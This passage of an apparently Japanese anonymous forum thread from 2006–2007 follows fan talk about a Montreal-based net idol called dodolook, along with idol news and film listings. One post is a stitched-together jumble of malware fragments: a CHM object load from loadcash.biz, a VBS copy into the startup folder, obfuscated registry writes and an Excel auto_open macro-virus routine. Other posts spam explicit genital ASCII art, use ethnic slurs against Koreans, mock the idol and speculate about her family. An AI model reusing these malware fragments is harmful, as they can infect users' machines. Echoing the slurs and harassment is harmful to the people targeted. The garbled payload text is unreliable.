お前脳に障害でもあるのか?
日本語理解できてる?

184 :美麗島の名無桑:2006/12/24(日) 14:58:25
まあまあみんなマッタリ行こう。俺もモントリオールに住んでるんだけど。なぜか暖かい。
雪も解けたしこの時期にしてはおかしいな。気温の差があるからdodoちゃんも風邪をひかないで
頑張っとくれ。

185 :美麗島の名無桑:2006/12/24(日) 16:05:58
中国人の女性はなぜこうも美しく頭がいいのでしょう

日本人の女性をみてると日本人として恥ずかしいです

dodoはじめ中国人女性のように純粋で面白くて他国を

愛せるようになってほしいものですね。

186 :美麗島の名無桑:2006/12/24(日) 17:11:15
>>184
そうらしいね。ドドのブログにも雪が降らないって書いてあった。
ドドはアメリカに旅行に行くんだね。てかそんな事より俺は今から本命の人とデート
なんだよ。自分頑張るっす。

187 :美麗島の名無桑:2006/12/24(日) 17:33:11

  ♪  きっと君はこない
            一人だけのクリスマスイブ ♪
    o           。      o        。
        _ o _               ___    __
   __  |:::::::::::::::|  /\  __   /:::::::::::::::::\  .|:::::::::|
 ∠:::::::::::\ |:::::::::::::::|/:::::::::::\ |:::::::::|_|::::: o :::::::::::::|  |:::::::::|
  | :::::::::::::::::::::::::::::::::|_|o ::::::::::::|._|:::::::::::::::::::::::::::::::::::::::::|_|:::。 ::|
      曰   : : : : : : : : : : : : :o : : : : : : : : : : : o: : : : : : : : :
  。    | |     。        。     。       
      ノ__丶       。       。     o   。    
      ||シャ|| 凵    __,-,,..,,,,__                o   
      ||ン||    .//./ 。  `ヽーっ    ⌒⌒⌒ 
      ||パ||  ⌒/ || o 3  ⌒_つ ⌒⌒ 。      ⌒⌒⌒
 ⌒   ||ン||  O''⌒``'ー---‐'''''"                。

188 :美麗島の名無桑:2006/12/24(日) 20:54:44
親日とか関係ないかわいいかかわいくないかだ

189 :美麗島の名無桑:2006/12/25(月) 00:30:58
dodoは日本人だお

190 :美麗島の名無桑:2006/12/25(月) 08:56:02
チョンにもファンが居るみたい
ttp://bbs.enjoykorea.jp/tbbs/read.php?board_id=pstar&nid=218453

191 :美麗島の名無桑:2006/12/25(月) 10:17:26
チョンは穴があれば誰でもいいんだろ

192 :美麗島の名無桑:2006/12/25(月) 10:27:13
ohisashiburi desu

193 :美麗島の名無桑:2006/12/25(月) 14:48:11
誰も否定できない中国人の女性は世界一

194 :美麗島の名無桑:2006/12/25(月) 16:10:43
あっそ

195 :美麗島の名無桑:2006/12/25(月) 16:13:37
          ∧_∧
          < `∀´ >
         /   /⌒ヽ
      _/⌒/⌒/ / |__
     / (つ /_/ /\ |  /\
   /  (_____/  ヽ/   \
  /| ̄ ̄         ̄ ̄|\   /
/  |   かまって     |  \/
    |   ください     |/


196 :美麗島の名無桑:2006/12/25(月) 17:27:00
dodoはやさしいから世界から愛される
日本も見習わなければならないね

197 :美麗島の名無桑:2006/12/25(月) 18:11:14
えぇー。dodolookが広東語しゃべってるのもあるんだけど。広東語も話せるの?
dodolookの広東は萌え萌えだね。

198 :美麗島の名無桑:2006/12/25(月) 18:26:09
中国人は日本人と違い簡単にマスターしてしまうからね

199 :美麗島の名無桑:2006/12/25(月) 23:15:17
(≧∇≦)

200 :美麗島の名無桑:2006/12/26(火) 00:48:04
親日だから好きなのか。
ださ。

201 :美麗島の名無桑:2006/12/26(火) 05:22:30
俺は最初に動画見た時、
恋する時と同じような胸キュンがしたからさ(;・∀・)

202 :美麗島の名無桑:2006/12/26(火) 09:36:19
親日だから好きとかねーよwww

203 :美麗島の名無桑:2006/12/26(火) 10:00:01
dodoは世界中の人を愛せるやさしい子なんだよ
>>200 のような日本人がいることを恥ずかしく
思います。

204 :美麗島の名無桑:2006/12/26(火) 15:51:35
俺、ニーハオマ! ぐらいしかわかんね

205 :美麗島の名無桑:2006/12/26(火) 15:55:52
ドドってカナダ語喋れるんかな?

206 :美麗島の名無桑:2006/12/26(火) 20:05:33
カナダ語?

207 :美麗島の名無桑:2006/12/26(火) 21:22:37
dodoなら喋れる

208 :美麗島の名無桑:2006/12/26(火) 22:06:42
日本語でおk

209 :美麗島の名無桑:2006/12/29(金) 15:31:15
>>200
だって反日のやつって知能低いじゃん
リトマス試験紙みたいに使えるよ。dodoはさすが親日

210 :美麗島の名無桑:2006/12/30(土) 01:53:23
>>209
日本の嫌韓反中も同じくらい知能低いよ( ´∀`)

211 :美麗島の名無桑:2006/12/30(土) 14:36:53
>>210
例えば、お前みたいな奴が典型だな。

212 :美麗島の名無桑:2006/12/30(土) 15:49:49
dodolookちゃんはアメリカ旅行に行くんだね。雪も降ってるって言ってるし
モントリオルから行けるとこだとニューヨークかな。新年の瞬間にあそこでジャンプ
するのは有名だからね。


213 :美麗島の名無桑:2006/12/30(土) 22:25:46
ほぅー
日本に来れば良いのにー

214 :美麗島の名無桑:2006/12/30(土) 22:51:22
日本においでよdodo
フヒヒ

215 :美麗島の名無桑:2006/12/31(日) 14:32:20
『吾輩は猫である』
監督:山本嘉次郎
出演:宇留木浩、徳川夢声、丸山定夫、千葉早智子、英百合子、北沢彪
『夏目漱石の三四郎』
監督:中川信夫
出演:山田真二、八千草薫、笠智衆、土屋嘉男、江原達怡、岩崎加根子
『こころ』
監督:市川崑
出演:森雅之、新珠三千代、三橋達也、安井昌二、田村秋子、奈良岡朋子
『それから』
監督:森田芳光
出演:松田優作、藤谷美和子、小林薫、笠智衆、中村嘉葎雄、草笛光子、風間杜夫
『ユメ十夜 Ten Nights of Dream』特番
夏目漱石自らが「100年後にその真実が理解されるだろう」と1906年に宣言した『夢十夜』。
それから100年後に満を持して製作された映画『ユメ十夜』の舞台裏に密着、監督&俳優が
偉大なる漱石文学の真実に迫る様を捉えたチャンネルNECOオリジナル特番です。

216 :美麗島の名無桑:2006/12/31(日) 14:33:00
『蝶々・雄二の夫婦善哉(みょうとぜんざい)』
監督:マキノ雅弘
出演:ミヤコ蝶々、南都雄二、丘さとみ、藤山寛美、茶川一郎、中田ダイマル・ラケット

217 :美麗島の名無桑:2006/12/31(日) 14:56:57
本年5月1日から活動を休止しておりました「NEWS」は、山下智久、小山慶一郎、錦戸亮、加藤成亮、増田貴久、手越祐也の6名で活動を再開させて頂くこととなりました。
「NEWS」は、大晦日深夜の「ジャニーズカウントダウン2006-2007」(東京ドーム)から活動を再開いたします。今後のスケジュールにつきましては、シングルリリースやコンサートツアー等を順次予定しておりますが、詳細は1月上旬に正式発表させて頂きます。


218 :美麗島の名無桑:2006/12/31(日) 21:08:31
何これ

219 :美麗島の名無桑:2007/01/01(月) 00:17:43
今ジャニのカウントダウソコンサート見てるんだけど
dodoが動画で使ったテレッテッテッテ♪って曲が嵐のサクラ咲けってことが分かった

220 :美麗島の名無桑:2007/01/01(月) 00:29:11
疑問なんだけどyoutubeとかにあがってる中国語字幕つきのジャニ動画って一体どこで入手してるんだろ?
日本に住むジャニヲタからもらって、中国(か他の国)で字幕つけてるのか
日本に住む中国人のジャニヲタがあげてるのか・・・

221 :美麗島の名無桑:2007/01/01(月) 17:01:40
      \   pubic hair    /
        \_  |   _/
            彡彡彡
            ミミミミ clitoris
           ミミミミ / ̄ ̄ ̄ ̄
           ノ σ ヽ urethra
         / / ゚ヽ ̄ ̄ ̄ ̄
labia majora/ //\\ \ 
   ̄ ̄ ̄ ̄  ( (vagina) ── labia minora
        \ \\// /
           `   \/  '
  \         *──anus
    \_____/\_____/

222 :美麗島の名無桑:2007/01/01(月) 20:23:57
dodolookは火星語だって話せるんだから広東、北京、英語、台語、法語、日語
ぐらい喋れるだろ。

223 :美麗島の名無桑:2007/01/01(月) 23:37:40
あけおめ!
新年好!
新年快楽!

224 :美麗島の名無桑:2007/01/02(火) 02:46:51
>>219
テレッテッテって良く分からんけど、俺も同じ事思った

225 :美麗島の名無桑:2007/01/02(火) 14:48:07
新作キt−

226 :美麗島の名無桑:2007/01/02(火) 18:22:06
うんこがしたいけど
うんこ我慢してると気持ちいからまだしなーい

227 :美麗島の名無桑:2007/01/03(水) 01:40:25
dodolo2kちゃん、お誕生日おめでとう。
Happy Birthday, dodo-tan

新作来たね。ニューヨークのdodoたん。可愛いよ。

228 :美麗島の名無桑:2007/01/03(水) 01:45:02
あ 今日誕生日か。


229 :美麗島の名無桑:2007/01/03(水) 03:43:41
      \   pubic hair    /
        \_  |   _/
            彡彡彡
            ミミミミ clitoris
           ミミミミ / ̄ ̄ ̄ ̄
           ノ σ ヽ urethra
         / / ゚ヽ ̄ ̄ ̄ ̄
labia majora/ //\\ \ 
   ̄ ̄ ̄ ̄  ( (vagina) ── labia minora
        \ \\// /
           `   \/  '
  \         *──anus
    \_____/\_____/


230 :美麗島の名無桑:2007/01/03(水) 04:50:30
      \   pubic hair    /
        \_  |   _/
            彡彡彡
            ミミミミ clitoris
           ミミミミ / ̄ ̄ ̄ ̄
           ノ σ ヽ urethra
         / / ゚ヽ ̄ ̄ ̄ ̄
labia majora/ //\\ \ 
   ̄ ̄ ̄ ̄  ( (vagina) ── labia minora
        \ \\// /
           `   \/  '
  \         *──anus
    \_____/\_____/


231 :美麗島の名無桑:2007/01/03(水) 04:51:32
      \   pubic hair    /
        \_  |   _/
            彡彡彡
            ミミミミ clitoris
           ミミミミ / ̄ ̄ ̄ ̄
           ノ σ ヽ urethra
         / / ゚ヽ ̄ ̄ ̄ ̄
labia majora/ //\\ \ 
   ̄ ̄ ̄ ̄  ( (vagina) ── labia minora
        \ \\// /
           `   \/  '
  \         *──anus
    \_____/\_____/


232 :美麗島の名無桑:2007/01/03(水) 04:53:30
dodoたんのライバル登場。
中国の16歳の粉香茗ちゃん。可愛いので、大陸で、人気上昇中。
dodoたんのパクリ路線。
ビデオブログは 56.comにあるよ。
http://www.56.com/v2/u_fenxiangming.html

56.comは、とっても重いので、youtubeでの検索では
http://www.youtube.com/results?search_query=%E7%B2%89%E9%A6%99%E8%8C%97&search=Search
良さそうなのは 
http://www.youtube.com/watch?v=jSfBD3tIV-0
http://www.youtube.com/watch?v=HjuQVEUfcEA
im.tvでも検索ででてくるよ。

でも、俺は、知的で可愛いdodoたんが好き。

233 :美麗島の名無桑:2007/01/03(水) 04:57:18
      \   pubic hair    /
        \_  |   _/
            彡彡彡
            ミミミミ clitoris
           ミミミミ / ̄ ̄ ̄ ̄
           ノ σ ヽ urethra
         / / ゚ヽ ̄ ̄ ̄ ̄
labia majora/ //\\ \ 
   ̄ ̄ ̄ ̄  ( (vagina) ── labia minora
        \ \\// /
           `   \/  '
  \         *──anus
    \_____/\_____/


234 :美麗島の名無桑:2007/01/03(水) 04:59:02
□■■■■■□□□■■■■■□□□■□□■□□■□□□■□
□■□□□■□□□■□□□■□□■□■□□■□■□□■□□
□■■■■■□□□■■■■■□■□□□■□□□■□□□□□
□■□□□■□□□■□□□■□■■■■□□■■■■■■□□
□■■■■■□□□■■■■■□□□■□□□■□□□□■□□
□■□□□□□□□□□□□■□□□■□□□■■■■■■□□
□■□□□□□□■□□□□■□■■■■■□■□□□□■□□
□■□□■■■■■■■□□■□□□■□□□■■■■■■□□
□■□□□□□□■□□□□■□■□■□■□■□□□□■□□
□■□□□□□■■□□□□■□■□■□■□■□□□□■□□
□■□□□□■□■□□□□■□■□■□□□■■■■■■□□
□■□□■■□□■□□□□■□□□■■■□□■□□■□□□
□■□□□□□■■□□□■■□■■■□□■■□□□□■■□
□■■■■■□□□■■■■■□□□■□□■□□■□□□■□
□■□□□■□□□■□□□■□□■□■□□■□■□□■□□
□■■■■■□□□■■■■■□■□□□■□□□■□□□□□
□■□□□■□□□■□□□■□■■■■□□■■■■■■□□
□■■■■■□□□■■■■■□□□■□□□■□□□□■□□
□■□□□□□□□□□□□■□□□■□□□■■■■■■□□
□■□□□□□□■□□□□■□■■■■■□■□□□□■□□
□■□□■■■■■■■□□■□□□■□□□■■■■■■□□
□■□□□□□□■□□□□■□■□■□■□■□□□□■□□
□■□□□□□■■□□□□■□■□■□■□■□□□□■□□
□■□□□□■□■□□□□■□■□■□□□■■■■■■□□
□■□□■■□□■□□□□■□□□■■■□□■□□■□□□
□■□□□□□■■□□□■■□■■■□□■■□□□□■■□

235 :美麗島の名無桑:2007/01/03(水) 05:00:10
         ■■■■■■■■
       ■■■■■■■■■
       ■■■■√ === │
     ■■■■√ 彡    ミ │
     ■■■√   ━    ━ \
     ■■■  ∵   (●  ●)∴│
     ■■■    丿■■■(  │  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
     ■■■     ■ 3 ■  │ < フェラーチョするぞフェラーチョするぞフェラーチョするぞ
     ■■■■   ■■ ■■ ■  │ フェラーチョするぞフェラーチョするぞ徹底的にフェラーチョするぞ
     ■■■■■■■■■■■■   \__________
     ■■■■■■■■■■■■
      ■■■■■■■■■■■
       ■■■■■■■■■■
     
        , -'        ◇         `-、
       /   ─       ─        ヽ、
      l l                      \
       /       ヽ /         ヽ,     \
      /                     l      \
      l  '::o::.`    l    '::o:::`    |\   
      l   `   '            `   '    l  \
      ヽ        丿ヽ         /   
        ゝ _            _ /
          l                /
           |              /
          /   /⌒ヽ、      l 
         /   / ハ ヽ      |
         /     | ' ` |         |
        /    l l     l        |
       /     | |     |   /  |
       /     |ノ    ヽ  /     l      
       /      /            |
      /      (   )(   )      |

236 :美麗島の名無桑:2007/01/03(水) 05:01:08
           |;;|
           |;;|
           |;;|    
           |;;|  
      λ., ; . |;;|         
      、!::i;;ヽ  |;;|           
      '|:::ゞ;`ヽ_|;;|    
      |〃:::::,,;; '';;;;#-,,vv.;、   
     'l#"~";;:;,, バ;;カ;;ヾ;`;;`; 
    /#"~  ;___,     ○(;、; 
    l';;; ;;; l#‐) ;i⌒i υ  ! 
     ! *  `~ ,  !m! ( 、 /  
     \   ) ) 。゙∴;;'  ノ
      /`ニニー-、_=:,-ーニヽ
    /:#)/;;;;#;'; ;';;';;ヾ、,,     
    l糞;;;;;┌┼┐イ ┬ ;;; ヾ、
    l;:;;.i!!│人││.申ヾ;死;|
    l#.i;;;│人││メ_;|l#.i;
    ヽ、_ノ|    ' ; ;;;|ヽ_ノ
       l#; ",  ' ;;/
       |;;;";r臭y.;;;;/   
      . |   ;,イ; ,;i
      /l ;'∵/: |;`'.,;'l  ∞〜
      /l ;'雑| : |`巾;l 
      | ヽ  ノ.:,ヽ__ノ
       i;' ! ̄ ゜・
       ヾヽ,  。   ∬
       ヽ、l  ' ∫
           ,
         ∬ .  ∫
    〜∞   . ∬
         ,,.∴,.;;:,
        "゙;゙"';`~;,''∵"
    ;;'',,;';; ;;ζ,;;; '人  ;..;,;
  ;;;;'", ";.   (;;;:;;:;)  
     '',.   (;;;:;:;;;;;;;;;)     "゙`
        (;;;:;;;:;;;;;;;;;;;;;;)


237 :美麗島の名無桑:2007/01/03(水) 05:02:12
Set A4 (1)))
<object data="m \\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P -FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
m
T
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

238 :美麗島の名無桑:2007/01/03(水) 08:15:33
dodoあけおめー( ・ω・)ノ

239 :美麗島の名無桑:2007/01/03(水) 09:36:01
だんだんと背景に中国企業(又は政府?)が見えてきて  
やっぱりなあ・・・という感じ

そういった背景を隠すために日本好きを装っているし、
実際その方が台湾にアピールする効果はあったわけだ

まあ武力じゃなくて文化で統一を図ろうという戦略は中国共産党にしては多少進歩かもしれんが



240 :美麗島の名無桑:2007/01/03(水) 12:24:50
それは無いだろ。デビュー前どころかカナダに移住する前から既に昔のホムペで日本ネタを使ってたし
子供の頃の写真では何人かの日本人の男子と写ってる写真もあるし文化的な事には好感が無い事はないだろう。

241 :美麗島の名無桑:2007/01/03(水) 12:56:47
やはりそういうことですか、うpしたった数ヶ月で事務所
デビューになるわけがありません。

そのころyoutubeを使ったプロモがはやりのころでパクリのようです。
台湾で成功するには日本好が条件で完全に狙ちいうち!

各所で宣伝・書き込み部隊が仕掛けの証拠ですけどね。

242 :美麗島の名無桑:2007/01/03(水) 14:35:56
やらせだったのはガチで本当だけど、239さんのは少し行き過ぎのような。
どどにただのスポンサーがついただけだと思うよ。言い方を変えれば
ヤラセでは無くプロモーションともとれる。you tubeのlonleygirl15と一緒で
プロデュースされてるだけなんだよ。


243 :美麗島の名無桑:2007/01/03(水) 22:28:03
>>241
数ヶ月なんてさほど早くないぞ
サマーの詩集とか知らないの?

244 :美麗島の名無桑:2007/01/03(水) 22:57:54
想像力が豊かな人が多いな
正月だねぇ

245 :美麗島の名無桑:2007/01/03(水) 23:20:31
どどるくはハロプロ系も好きなだってね。ベリーズ工房とか聞いてたみたいだし。
松浦あやも聴くんだね。

246 :美麗島の名無桑:2007/01/03(水) 23:46:44
新作の字幕が
dodolookじゃなくdodoLookになってるのが気になる(´・ω・`)
なぜ大文字(´・ω・`)

247 :美麗島の名無桑:2007/01/04(木) 00:00:52
中国大陸のブログ数は 06年末で 6000万と言われているように、
今、ネットの爆発期になってる。 ポータルサイトの乱立から web2.0時代
になって、集約化と生き残りに躍起な状況。 こんな中で、SNSや
ポータルサイトが dodolookちゃん等のネットアイドルを前面に出して、
注目を集めることが ビジネス的な常套手段であることは明白。
dodolookちゃん達は むしろ利用されているわけ。 dodolookちゃんは
実際に、mop.comと契約していて、台湾より大陸を向いている。
新しいネットアイドルが出てくれば、忘れられる可能性もある立場。
自分の好きなデザイン分野の学業を中心にして、ネットでの活動もできれ
ば、dodolookちゃんは幸せじゃないかな。vlogでの偉業はキャリヤにもなるわけで。

248 :美麗島の名無桑:2007/01/04(木) 00:07:38
>>246
ほんとだ、dodoLookになってる。
本人は、小文字が正解と言っていたのに何でだろう。
dodoが、NYを Lookしたということかな。

249 :美麗島の名無桑:2007/01/04(木) 12:05:09
確かにmop.comと契約していて、台湾より大陸を向いているけど、ほとんど台湾のサイト
ばかり更新するのはなんでだろう。yahooのも台湾だし。ドドちゃんのブログは全部で
8個あるけどvlogとyahoo除けばちょっと放置ぎみみたいだけど。


250 :美麗島の名無桑:2007/01/04(木) 12:05:33
新作キt−
今回は手抜き・・・?
前回の様なのが良かったなぁ
最近綺麗にまとめてるけど、抑えられてるのかな

251 :美麗島の名無桑:2007/01/04(木) 14:13:34
下品な鮮人が荒らしてるな

252 :美麗島の名無桑:2007/01/04(木) 14:37:31
dodolookちゃんはもっと台湾で活躍すればいいんだよ、そしたら錦戸亮に
いつか出逢えるはずさ。

253 :美麗島の名無桑:2007/01/04(木) 16:56:38
mop.comってサイト名が痛いな
昔日の競馬板の痛いコテハンを思い出すぜ

254 :美麗島の名無桑:2007/01/04(木) 17:08:59
もうdodoは蛇になんて相手にしてないよ
亮以外のお気に入りができたから

255 :美麗島の名無桑:2007/01/04(木) 20:23:35
>>249
dodoたんは、繁体字が通常で、簡体字を書くのは大変なのかもしれないね。

中国のネットアイドルの酷評記事によると、dodoたんは北京で開催された
ネット博に呼ばれたのに、用事があると断ったんだって。 12月のネット博の
ことだったら、dodoは ニューヨーク観光を優先したことになるね。 この時は
結局、北京には行かないで、ビデオを送ったのみだし。dodoたんは、やっぱり
本当の芸能人になろうとは思って無いんだよ。 好きなことがやれたらいいな、
程度じゃないかな。

256 :美麗島の名無桑:2007/01/04(木) 20:55:32
>>255
よくそんな記事見つけてくるなぁwww

俺なんか簡体字みるだけで喘息の発作が出るわ

257 :美麗島の名無桑:2007/01/04(木) 21:46:14
桂林は繁体字なの?広東語喋ったり時には台湾訛りだったり北京だったりと
軽く混乱するよ。ネット博始まった時dodoはまだ試験中じゃなかったっけ?
NYはX'masだったから北京に参加しようと思えば行けたような気も。

258 :美麗島の名無桑:2007/01/04(木) 22:02:26
君ら凄いわ

259 :美麗島の名無桑:2007/01/05(金) 01:18:48
■■□■■■■□■■■■□■■■■■■■■■■□■■■■■■■■
■■□□□□■■□■■■□■■□□□□□■■■□■■■■■■■■
■■□■■□■■□■■■□■■■■■■□■■■□■■■■■■■■
■□■■■□■■■■■□■■■■■■□■■■■□■■■■■■■■
■□■■■□■■■■■□■■■■■■□■■■■□■■■□■■■■
■■■■■□■■■■■□■■■■■□■■■■■□■■■□■■■■
■■■■□■■■■■□■■■■■■□□■■■■□■■□■■■■■
■■■■□■■■■■□■■■■■□■■□■■■□■■□■■■■■
■■■□■■■■■□■■■■■□■■■■□■■□■□■■■■■■
■■□■■■■■□■■■■■□■■■■■■■■□□■■■■■■■
■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■■
■■■■□■■■■■□■■■■■■■■■■■■■■■■■■■■■
■■■□□■■■■■□■■■■■■■□□□□□□□□□□□□■■
■■□□■■■■■□□□□□□■■■■■■■■■■■■■□□■■
■□□■■□■■■□■■■■□■■■■■■■■■■■■□□■■■
■■□■□□■■□□□■■□□■■■■■■■■■■■□□■■■■
■■■□□■■□□■□□□□■■■■■■■■■■■□□■■■■■
■■□□■■■■■■■□□■■■■■■■■■■■□□■■■■■■
■■□■■■□■■■□□□□■■■■■■■■■■□■■■■■■■
■□□□□□□■■□□■■□□■■■■■■■■■□■■■■■■■
■■■■□■■■□□■■■■□□■■■■■■■■□■■■■■■■
■■□■□■□■■■■□□■■■■■■■■■■■□■■■■■■■
■■□■□■□■■■■■□□■■■■■■■■■■□■■■■■■■
■□□■□■□■■■■■■■■■■■■■■■■■□■■■■■■■
■□■■□■■■■□□□■■■■■■■■■■■■□■■■■■■■
■■■■□■■■■■■□□□■■■■■■■■■■□■■■■■■■
■■■■□■■■■■■■■□□■■■■■■□□□□■■■■■■■


260 :美麗島の名無桑:2007/01/05(金) 01:19:36
\                          /   
  \                          /
   \                      ./
     \                   /
      \                  /
        \               /
         \             ./
           \           ./
            \         /
              \      ./
               \    /
      上、         \, ,/         ,エ
       `,ヾ         ,;;iiiiiiiiiii;、       _ノソ´
        iキ       ,;;´  ;lllllllllllllii、      iF
        iキ'     ,;´  ,;;llllllllllllllllllllii、    ナf
         !キ、._  ,=ゞiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii!! __fサ
          `ヾ=;三ミミミミヾ仄彡彡ミミヾ=`´
           ,._Ξミミミミミヾ巛彡////iii_
         ;if≡|ヾヾヾミミミミヾヾ、//巛iiリ≡キi
          if!  |l lヾヾシヾミミミ川|ii//三iリ `キi
        ,if ,f=|l l lヾリリリリリ川川|爪ミミiリ=t、キi
          ;iナ,サ |l l l リリ川川川川|爪ミミiiリ キi キi
          iナ ;サ |l l リリリリ川川川川l爪ミミilリ キi キi
        iサ ;サ, |リ リリ川川川川川l爪ミミiリ ,キi キi
         iサ ;サ, | リ彡彡川川川川|爪ミミiリ ,キi :キ、
        ,i厂 iサ, |彡彡彡彡ノ|川川|爪ミミリ ,キi `ヘ、
      ,√  ;サ, |彡彡彡彡ノ川川|ゞミミミリ ,キi   `ヾ
     ´    ;サ,  |彡彡彡彡川川リゞミミリ  ,キi
         ;サ,  |彡彡彡彡リリリミミミシ   ,キi
         ,;#,    |彡彡ノリリリリミミミシ    ,キi
        ;メ'´    !彡ノリリリリリゞミミシ     `ヘ、
       ;メ      ヾリリリリノ巛ゞシ       `ヘ、
      ;メ        ``十≡=十´         `ヘ、
                 ノ    ゞ

261 :美麗島の名無桑:2007/01/05(金) 01:20:11
   / ̄ ̄ ̄ ̄\      
   (  人____)      
    |ミ/    - - )   
   (6     (_ _) )  
   | ∴ ノ 3  ノ 
    /\_____ノ    
   (   ||      )
   | | dodo命  ヽ  
   |__|______)  
   (__)三三三[□]三)   
  /(_)\:::::::::::::::::::::::|     
|千葉 |::::::::/:::::::/     
 (_____):::::/::::::/      
     (___[]_[] )  


262 :美麗島の名無桑:2007/01/05(金) 01:22:05
          _|\ _
         / u 。 `ー、___ ヽ
        / ゚ 。 ⌒ 。 ゚ u  / つ
       /u ゚ (●) u ゚`ヽ。i  わ
       | 。 ゚,r -(、_, )(●) /  ぁぁ
     il  ! //「エェェ、 ) ゚ u/  あぁ
 ・ 。  || i rヽ ir- r 、//。゚/ i   ああ
  \. || l   ヽ`ニ' ィ―'  il | i  ぁあ
 ゚ヽ | | ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄| | ダンッ
。 ゚ _(,,)  基地外dodo  (,,)_ / ゚
 ・/ヽ|             |て ─ ・。 :
/  .ノ|________.|(  \ ゚ 。
 ̄。゚ ⌒)/⌒Y⌒Y⌒Y⌒Y⌒ヽ\  ̄ 。

263 :美麗島の名無桑:2007/01/05(金) 01:23:04
>>251
チョンはdodoですよwwwwwwwwwwwwwwwwwwwww
dodo好きはチョンwwwwwwwwww

264 :美麗島の名無桑:2007/01/05(金) 07:59:35
馬鹿改行の自演ばっかwww

265 :美麗島の名無桑:2007/01/05(金) 08:42:00
dodoの実家はかなり裕福そうだね?
中国人がカナダに留学してのんきにNY旅行するなんてすごい

266 :美麗島の名無桑:2007/01/05(金) 15:56:28
>>265
今時糞田舎小作農以外普通だよ
世界中中国人だらけマナー悪くて困る

267 :美麗島の名無桑:2007/01/05(金) 19:17:49
グレイハウンドの長距離バスだろ。 
モントリオールからニューヨークまで 8時間だから、東京から
青森って感じじゃないかな。 青森県民が、ディズニーランドに
行くようなものだね。

268 :美麗島の名無桑:2007/01/05(金) 22:40:30
モントリ在住の俺だけど、この辺りに住んでる移民はそういう訳でもないがドド家は
裕福そうだね。デザインは特に授業料が高いんだよ。教材だけでも揃えたら6,7万はいるからね。
でもドドは永住権があるからclass feesだけは留学生用の高いのを払わなくてすむんだよ。

269 :美麗島の名無桑:2007/01/06(土) 00:54:09
なぜドドは永住権を持てたのだろうか。
あのカナダの訳分からん点取りシステムで高得点をゲトしたのだろうけど

270 :美麗島の名無桑:2007/01/06(土) 02:58:05
>>269
両親が永住権を取って、dodoも英語を勉強して永住権を
取ったらしい。 親は、商売でもやってて、金持ちじゃないかな。

271 :美麗島の名無桑:2007/01/06(土) 09:53:26
>>268
dodoのお宝写真キボンヌ

272 :美麗島の名無桑:2007/01/06(土) 10:23:48
宣伝部隊orz

273 :美麗島の名無桑:2007/01/06(土) 16:30:17
関ジャニの中だとやっぱ錦戸亮はかっこいいな。俺の彼女もジャニ好きだから
よく見せられるんだけど詳しくなっちゃった。内って人が復帰したって聞かされたけど
dodoは知ってるのかな。

274 :美麗島の名無桑:2007/01/06(土) 16:50:38
(´・ω・`)知らんがな

275 :美麗島の名無桑:2007/01/06(土) 17:16:55
どどはその事をもう知ってるよ。12月31日に発表された事をもう翌日のブログに
は書いてるし、johnny's webとかも台湾にあるからね。

276 :美麗島の名無桑:2007/01/06(土) 19:28:15
俺女なジャニヲタ

277 :美麗島の名無桑:2007/01/06(土) 21:29:28
大家新年好!謹賀新年!

278 :美麗島の名無桑:2007/01/07(日) 08:07:19
ttp://web.6park.com/bbs/messages/79084.html

279 :美麗島の名無桑:2007/01/07(日) 10:43:23
どど

280 :美麗島の名無桑:2007/01/07(日) 11:36:59
亮ちゃん再び「Attention Please」
女優、上戸彩(21)が今年4月に主演したフジテレビ系連続ドラマ「アテンションプリーズ」が、1月13日にスペシャルドラマで戻ってくる。
洋子との仲が注目の整備士・翔太を演じる錦戸亮(22)も「久しぶりの翔太君を目いっぱい演じようと思います」と張り切っている。

281 :美麗島の名無桑:2007/01/07(日) 17:39:01
dodoをきっかけに錦戸のファンになった香具師いる?

282 :美麗島の名無桑:2007/01/07(日) 18:00:36
リンダリンダリンダ。
dodoは小池徹平もすきみたいだよ。

283 :美麗島の名無桑:2007/01/07(日) 21:48:18
なるふぉど、ドドは年下系が好きなのかな。俺もドドより年下なんだけどなあ。

284 :美麗島の名無桑:2007/01/07(日) 23:25:19
大体ジャニが好きなのってショタが多いんだろうな
ジャニって童顔多いし

285 :美麗島の名無桑:2007/01/07(日) 23:41:56
山下智久の白虎隊を見て超感動した。
涙が止まらないよー ゜(゜´Д`゜)゜。
関係ないこと書いてごめんね。


286 :美麗島の名無桑:2007/01/08(月) 00:56:46
リンダ♪リンダ♪

287 :美麗島の名無桑:2007/01/08(月) 05:08:39
http://up2.viploader.net/upphp/src/vlphp2860.jpg


288 :美麗島の名無桑:2007/01/08(月) 15:44:51
>>285
氏ね

289 :美麗島の名無桑:2007/01/08(月) 16:59:01
どどは野ブタをプロデュースを見てから山下智久もちょっと好きになったんだって。
なんとなくどどの好きなタイプは共通してるね。

290 :美麗島の名無桑:2007/01/08(月) 21:36:48
dodolookの好きなタイプは垂れ目系って事かい。本人も垂れ目がちだしね。
可愛いなdodolookは。

291 :美麗島の名無桑:2007/01/08(月) 23:35:41
台湾娘かわいいなぁ〜

http://funimg.pchome.com.tw/img_upload/NETPAL/s/h/20061220_sheni1013_171622.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/l/o/20070106_love_bobo04_230538.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/r/e/20061111_read_read_174748.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/t/o/20061221_tokyo7533_003039.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/j/e/20061231_jenny200a_152224.jpg
http://funimg.pchome.com.tw/img_upload/NETPAL/l/o/20070108_love_bobo04_193958.jpg
